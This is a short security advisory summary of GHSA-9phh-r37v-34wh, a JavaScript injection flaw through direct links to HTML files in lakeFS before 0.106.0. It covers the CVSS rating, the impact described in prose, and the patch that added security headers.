GHSA-9phh-r37v-34wh: 
vulnerability analysis and mitigation

The vulnerability (GHSA-9phh-r37v-34wh) affects lakeFS versions prior to 0.106.0, discovered and disclosed on August 14, 2023. This security issue involves arbitrary JavaScript injection through direct links to HTML files in the lakeFS system. The vulnerability allows the browser to render HTML files and execute JavaScript within the context of the lakeFS domain (GitHub Advisory).

The vulnerability has been assigned a CVSS score of 5.8 (Moderate severity) with the following characteristics: Network attack vector, High attack complexity, Low privileges required, User interaction required, Changed scope, High confidentiality impact, and No impact on integrity or availability. The CVSS string is CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N (GitHub Advisory).

When exploited, the vulnerability allows attackers to inject malicious scripts inline, download resources from other domains, or make arbitrary HTTP requests within the context of the lakeFS domain. This could result in information being sent to unauthorized domains or the execution of lakeFS operations while impersonating the victim. However, the attack requires the attacker to have prior access to upload malicious HTML files to repositories and depends on the victim opening the malicious HTML file link (GitHub Advisory).

The vulnerability has been patched in lakeFS version 0.106.0. The fix includes implementing security headers such as Content-Security-Policy with 'default-src none', X-Content-Type-Options with 'nosniff', and X-Frame-Options with 'DENY'. No alternative workarounds are available for users who cannot immediately upgrade (GitHub Commit, GitHub Release).